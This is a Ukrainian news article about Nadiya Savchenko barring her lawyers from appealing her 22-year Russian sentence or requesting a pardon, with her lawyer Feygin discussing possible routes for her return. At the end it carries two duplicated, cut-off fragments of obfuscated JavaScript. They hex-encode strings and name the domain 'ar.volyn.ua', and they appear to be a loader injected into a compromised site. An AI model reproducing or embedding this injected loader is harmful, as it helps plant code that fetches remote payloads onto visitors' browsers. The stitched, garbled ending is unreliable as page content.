Савченко заборонила своїм адвокатам клопотати про помилування

Українська льотчиця Надія Савченко після оголошення вироку написала листи своїм адвокатам з вимогою не подавати апеляцію.

Про це інформує ТСН.

Як йдеться у листі, який адвокат Марк Фейгін показав ТСН, Надія заборонила вживати будь-які заходи без її відома. Зокрема, заборонила подавати апеляцію, прохання про помилування чи то заяви про визнання її провини. У разі порушення цих умов льотчиця пообіцяла миттєво відмовитись від послуг своїх захисників.

«У разі порушення моєї волі, буду розцінювати це як зраду з Вашого боку з автоматичною відмовою від вас як від адвоката, після подібних дій», – йдеться у листах, які власноруч написала Надія трьом своїм адвокатам.

Втім, за словами Фейгіна, для повернення Надії до України є два законних юридичних шляхи, і який з них буде застосовано, поки невідомо.

ЧИТАТИ БІЛЬШЕ: 631 ДЕНЬ УВ’ЯЗНЕННЯ НАДІЇ САВЧЕНКО. ІНФОГРАФІКА

«Якщо найближчими днями буде досягнуто якесь рішення про її повернення додому, все одно воно буде якось оформлено. Ми поки не знаємо як, але я як юрист, бачу тільки два способи. Один – це конвенція про відбування покарань, про видачу ув’язнених, другий – це помилування. Інших шляхів не існує», – каже адвокат.

Надія відкидає можливість подання прохання про помилування, але буде обговорювати з юристами всі варіанти.

«Надя не хоче подавати прохання про помилування. Але якщо цей спосіб буде запропоновано, вона буде його обговорювати зі своїми адвокатами», – зауважив Фейгін.

Напередодні російський суд засудив Надію Савченко до 22 років ув’язнення. До набуття вироком чинності Надію утримуватимуть у СІЗО Новочеркаська. Після цього Савченко має твердий намір відновити сухе голодування. Вирок українці засудили у світі, а українська влада приступає до активних перемовин щодо обміну полоненої. Фейгін пообіцяв, що Савченко не буде сидіти у російській тюрмі.

385344461

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “ar.volyn.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ar.volyn.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e